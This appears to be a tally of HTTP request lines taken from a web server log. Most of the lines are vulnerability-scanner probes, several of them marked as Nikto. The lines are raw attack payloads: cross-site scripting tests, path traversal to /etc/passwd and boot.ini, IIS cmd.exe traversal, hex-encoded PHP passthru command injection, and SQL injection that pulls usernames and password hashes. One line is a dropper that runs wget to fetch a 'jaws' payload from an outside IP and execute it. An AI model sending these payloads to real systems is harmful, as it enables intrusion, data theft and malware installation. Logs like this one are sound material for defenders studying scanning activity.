1 GET /modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /movimientos/ HTTP/1.1
1 GET /mp3/ HTTP/1.1
1 GET /mpcgi/ HTTP/1.1
1 GET /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb HTTP/1.1
1 GET /mqseries/ HTTP/1.1
2 GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c HTTP/1.1
1 GET /msadc/msadcs.dll HTTP/1.1
1 GET /msadc/samples/adctest.asp HTTP/1.1
1 GET /msadm/domain/index.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /msadm/site/index.php3?authid=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /msadm/user/login.php3?account_name=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /msql/ HTTP/1.1
1 GET /msword/ HTTP/1.1
1 GET /musicqueue.cgi HTTP/1.1
1 GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /myinvoicer/config.inc HTTP/1.1
2 GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent HTTP/1.1
2 GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= HTTP/1.1
1 GET /na_admin/ HTTP/1.1
1 GET /na_admin/ataglance.html HTTP/1.1
1 GET /names.nsf HTTP/1.1
1 GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> HTTP/1.1
1 GET /ncl_items.html HTTP/1.1
1 GET /ncl_items.shtml?SUBJECT=1 HTTP/1.1
1 GET /netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /netget?sid=user&msg=300&file=../../../../../../../../../boot.ini HTTP/1.1
1 GET /netscape/ HTTP/1.1
1 GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /new/ HTTP/1.1
1 GET /new HTTP/1.1
1 GET /news/news.mdb HTTP/1.1
1 GET /news HTTP/1.1
1 GET /newuser?Image=../../database/rbsserv.mdb HTTP/1.1
1 GET /node/view/666\\\"><script>alert(document.domain)</script> HTTP/1.1
1 GET /nosuchurl/><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /noticias/ HTTP/1.1
1 GET /nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 HTTP/1.1
1 GET /nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 HTTP/1.1
1 GET /nsn/..%5Cutil/attrib.bas HTTP/1.1
1 GET /nsn/..%5Cutil/chkvol.bas HTTP/1.1
1 GET /nsn/..%5Cutil/copy.bas HTTP/1.1
1 GET /nsn/..%5Cutil/del.bas HTTP/1.1
1 GET /nsn/..%5Cutil/dir.bas HTTP/1.1
1 GET /nsn/..%5Cutil/dsbrowse.bas HTTP/1.1
1 GET /nsn/..%5Cutil/glist.bas HTTP/1.1
1 GET /nsn/..%5Cutil/lancard.bas HTTP/1.1
1 GET /nsn/..%5Cutil/md.bas HTTP/1.1
1 GET /nsn/..%5Cutil/rd.bas HTTP/1.1
1 GET /nsn/..%5Cutil/ren.bas HTTP/1.1
1 GET /nsn/..%5Cutil/send.bas HTTP/1.1
1 GET /nsn/..%5Cutil/set.bas HTTP/1.1
1 GET /nsn/..%5Cutil/slist.bas HTTP/1.1
1 GET /nsn/..%5Cutil/type.bas HTTP/1.1
1 GET /nsn/..%5Cutil/userlist.bas HTTP/1.1
1 GET /nsn/..%5Cweb/env.bas HTTP/1.1
1 GET /nsn/..%5Cweb/fdir.bas HTTP/1.1
1 GET /nsn/..%5Cwebdemo/env.bas HTTP/1.1
1 GET /nsn/..%5Cwebdemo/fdir.bas HTTP/1.1
1 GET /nsn/env.bas HTTP/1.1
1 GET /nsn/fdir.bas HTTP/1.1
1 GET /nsn/fdir[.]bas:ShowVolume HTTP/1.1
1 GET /nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1
1 GET /null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full HTTP/1.1
1 GET /oc/Search/SQLQHit.asp HTTP/1.1
1 GET /oc/Search/sqlqhit.asp HTTP/1.1
1 GET /odbc/ HTTP/1.1
1 GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.1
1 GET /officescan/cgi/cgiChkMasterPwd.exe HTTP/1.1
1 GET /officescan/cgi/jdkRqNotify.exe HTTP/1.1
1 GET /officescan/hotdownload/ofscan.ini HTTP/1.1
1 GET /old/ HTTP/1.1
1 GET /openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt; HTTP/1.1
1 GET /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> HTTP/1.1
1 GET /oracle HTTP/1.1
1 GET /oradata/ HTTP/1.1
1 GET /order/ HTTP/1.1
1 GET /order/order_log.dat HTTP/1.1
1 GET /order/order_log_v12.dat HTTP/1.1
1 GET /orders/ HTTP/1.1
1 GET /orders/checks.txt HTTP/1.1
1 GET /orders/mountain.cfg HTTP/1.1
1 GET /orders/order_log.dat HTTP/1.1
1 GET /orders/order_log_v12.dat HTTP/1.1
1 GET /orders/orders.log HTTP/1.1
1 GET /orders/orders.txt HTTP/1.1
1 GET /outgoing/ HTTP/1.1
1 GET /ows-bin/ HTTP/1.1
1 GET /ows-bin/perlidlc.bat?&dir HTTP/1.1
1 GET /ows/ HTTP/1.1
1 GET /ows/restricted%2eshow HTTP/1.1
1 GET /pafiledb/includes/team/file.php HTTP/1.1
1 GET /page.cgi?../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /pages/ HTTP/1.1
1 GET /pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E HTTP/1.1
1 GET /passwd.adjunct HTTP/1.1
1 GET /passwd.txt HTTP/1.1
1 GET /passwd HTTP/1.1
1 GET /passwdfile HTTP/1.1
1 GET /password.inc HTTP/1.1
1 GET /password/ HTTP/1.1
1 GET /password HTTP/1.1
1 GET /passwords.txt HTTP/1.1
1 GET /passwords/ HTTP/1.1
2 GET /path/nw/article.php?id=' HTTP/1.1
1 GET /pathtest.pl HTTP/1.1
1 GET /pbserver/pbserver.dll HTTP/1.1
1 GET /pccsmysqladm/incs/dbconnect.inc HTTP/1.1
1 GET /pdf/ HTTP/1.1
1 GET /people.list HTTP/1.1
1 GET /perl/-e%20%22system('cat%20/etc/passwd');\\%22 HTTP/1.1
1 GET /perl/-e%20print%20Hello HTTP/1.1
1 GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phorum/admin/stats.php HTTP/1.1
1 GET /photo/ HTTP/1.1
1 GET /photo/manage.cgi HTTP/1.1
1 GET /photodata/ HTTP/1.1
1 GET /photodata/manage.cgi HTTP/1.1
1 GET /php-cgi HTTP/1.1
1 GET /php-coolfile/action.php?action=edit&file=config.php HTTP/1.1
1 GET /php.cgi HTTP/1.1
1 GET /php.fcgi HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php/php.exe?c:\\boot.ini HTTP/1.1
1 GET /php/php.exe?c:\\winnt\\boot.ini HTTP/1.1
1 GET /php4 HTTP/1.1
1 GET /php5 HTTP/1.1
1 GET /phpBB/My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/phpinfo.php HTTP/1.1
1 GET /phpBB/viewtopic.php?t=17071&highlight=\\\">\\\"<script>javascript:alert(document.cookie)</script> HTTP/1.1
1 GET /phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpBB2/search.php?search_id=1\\\\ HTTP/1.1
1 GET /phpEventCalendar/file_upload.php HTTP/1.1
1 GET /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1
1 GET /php HTTP/1.1
1 GET /phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script> HTTP/1.1
1 GET /phpimageview.php?pic=javascript:alert(8754) HTTP/1.1
1 GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1
1 GET /phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1
1 GET /phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1
1 GET /phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\\\ HTTP/1.1
1 GET /phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E HTTP/1.1
1 GET /phprocketaddin/?page=../../../../../../../../../../boot.ini HTTP/1.1
1 GET /phptonuke.php?filnavn=/etc/passwd HTTP/1.1
1 GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1
1 GET /phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /phpwebfilemgr/index.php?f=../../../../../../../../../etc HTTP/1.1
1 GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= HTTP/1.1
1 GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\\\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] HTTP/1.1
1 GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /pls/simpledad/admin_/dadentries.htm HTTP/1.1
1 GET /pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit HTTP/1.1
1 GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 HTTP/1.1
1 GET /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../ HTTP/1.1
1 GET /pmlite.php HTTP/1.1
1 GET /pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /postinfo.html HTTP/1.1
1 GET /postnuke/My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /postnuke/html/My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1
1 GET /postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> HTTP/1.1
1 GET /postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1
1 GET /postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\\\"%3<script>alert('Vulnerable')</script>
1 GET /postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /pp.php?action=login HTTP/1.1
1 GET /prd.i/pgen/ HTTP/1.1
1 GET /printenv HTTP/1.1
1 GET /profile.php?u=7FlCrYmO HTTP/1.1
1 GET /profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /pub/english.cgi?op=rmail HTTP/1.1
1 GET /publisher/ HTTP/1.1
1 GET /put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd HTTP/1.1
1 GET /pvote/ch_info.php?newpass=password&confirm=password%20 HTTP/1.1
1 GET /pw/storemgr.pw HTTP/1.1
1 GET /query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /quikstore.cfg HTTP/1.1
1 GET /quikstore.cgi HTTP/1.1
1 GET /reademail.pl HTTP/1.1
1 GET /readme.eml HTTP/1.1
1 GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /restore_config.cgi HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /rtm.log HTTP/1.1
1 GET /ruby.rb HTTP/1.1
1 GET /samples/search.dll?query=<script>alert(document.cookie)</script>&logic=AND HTTP/1.1
1 GET /scgi-bin/ HTTP/1.1
1 GET /scozbook/view.php?PG=whatever HTTP/1.1
1 GET /script>alert('Vulnerable')</script>.cfm HTTP/1.1
1 GET /scripts/Carello/Carello.dll HTTP/1.1
1 GET /scripts/ HTTP/1.1
1 GET /scripts/cpshost.dll HTTP/1.1
1 GET /scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini HTTP/1.1
1 GET /scripts/httpodbc.dll HTTP/1.1
1 GET /scripts/iisadmin/bdir.htr HTTP/1.1
1 GET /scripts/iisadmin/ism.dll HTTP/1.1
1 GET /scripts/no-such-file.pl HTTP/1.1
1 GET /scripts/proxy/w3proxy.dll HTTP/1.1
1 GET /scripts/repost.asp HTTP/1.1
1 GET /scripts/root.exe?/c+dir+c:\\+/OG HTTP/1.1
1 GET /scripts/samples/details.idc HTTP/1.1
1 GET /scripts/samples/search/author.idq HTTP/1.1
1 GET /scripts/samples/search/filesize.idq HTTP/1.1
1 GET /scripts/samples/search/filetime.idq HTTP/1.1
1 GET /scripts/samples/search/qfullhit.htw HTTP/1.1
1 GET /scripts/samples/search/qsumrhit.htw HTTP/1.1
1 GET /scripts/samples/search/queryhit.idq HTTP/1.1
1 GET /scripts/samples/search/simple.idq HTTP/1.1
1 GET /scripts/tools/ctss.idc HTTP/1.1
1 GET /scripts/tools/dsnform.exe HTTP/1.1
1 GET /scripts/tools/dsnform HTTP/1.1
1 GET /scripts/tools/newdsn.exe HTTP/1.1
1 GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.1
1 GET /search.asp?term=<%00script>alert('Vulnerable')</script> HTTP/1.1
1 GET /search.cgi HTTP/1.1
1 GET /search.php?searchfor=\\\"><script>alert(1776)</script> HTTP/1.1
1 GET /search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /search.php?zoom_query=<script>alert(\\\"hello\\\")</script> HTTP/1.1
1 GET /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script> HTTP/1.1
1 GET /search/SQLQHit.asp HTTP/1.1
1 GET /search/htx/SQLQHit.asp HTTP/1.1
1 GET /search/htx/sqlqhit.asp HTTP/1.1
1 GET /search/index.cfm?<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1
1 GET /search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt; HTTP/1.1
1 GET /search/sqlqhit.asp HTTP/1.1
1 GET /search?NS-query-pat=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.1
1 GET /search HTTP/1.1
1 GET /securecontrolpanel/ HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /server.php HTTP/1.1
1 GET /server/ HTTP/1.1
1 GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/SchedulerTransfer HTTP/1.1
1 GET /servlet/SessionManager HTTP/1.1
1 GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22& HTTP/1.1
1 GET /servlet/allaire.jrun.ssi.SSIFilter HTTP/1.1
1 GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.1
1 GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1
1 GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlet/sunexamples.BBoardServlet HTTP/1.1
1 GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 HTTP/1.1
1 GET /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /servlet/webacc?User.html=noexist HTTP/1.1
1 GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /servlets/SchedulerTransfer HTTP/1.1
1 GET /session/admnlogin HTTP/1.1
1 GET /settings/site.ini HTTP/1.1
1 GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P HTTP/1.1
1 GET /setup.nsf HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+27[.]254[.]163[.]205/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"Vulnerable\\\")&lt;/script&gt; HTTP/1.1
1 GET /shopa_sessionlist.asp HTTP/1.1
1 GET /shopadmin.asp HTTP/1.1
1 GET /shopdbtest.asp HTTP/1.1
1 GET /shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /shopexd.asp?catalogid='42 HTTP/1.1
1 GET /shopping/diag_dbtest.asp HTTP/1.1
1 GET /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> HTTP/1.1
1 GET /shopping300.mdb HTTP/1.1
1 GET /shopping400.mdb HTTP/1.1
1 GET /shoppingdirectory/midicart.mdb HTTP/1.1
1 GET /showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.1
1 GET /showmail.pl?Folder=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /showmail.pl HTTP/1.1
1 GET /signon HTTP/1.1
1 GET /simplebbs/users/users.php HTTP/1.1
1 GET /sips/sipssys/users/a/admin/user HTTP/1.1
2 GET /site/' UNION
1 GET /site/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1
1 GET /site/typo3conf/ HTTP/1.1
1 GET /site/typo3conf/database.sql HTTP/1.1
1 GET /site/typo3conf/localconf.php HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /siteminder/smadmin.html HTTP/1.1
1 GET /siteminder HTTP/1.1
1 GET /siteseed/ HTTP/1.1
1 GET /smg_Smxcfg30.exe?vcc=3560121183d3 HTTP/1.1
1 GET /smssend.php HTTP/1.1
1 GET /soapdocs/ReleaseNotes.html HTTP/1.1
1 GET /soinfo.php?\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /somethingnotthere.ida HTTP/1.1
1 GET /splashAdmin.php HTTP/1.1
1 GET /sqldump.sql HTTP/1.1
1 GET /sqlnet.log HTTP/1.1
1 GET /sqlqhit.asp HTTP/1.1
1 GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /ssdefs/ HTTP/1.1
1 GET /ssdefs/siteseed.dtd HTTP/1.1
1 GET /sshome/ HTTP/1.1
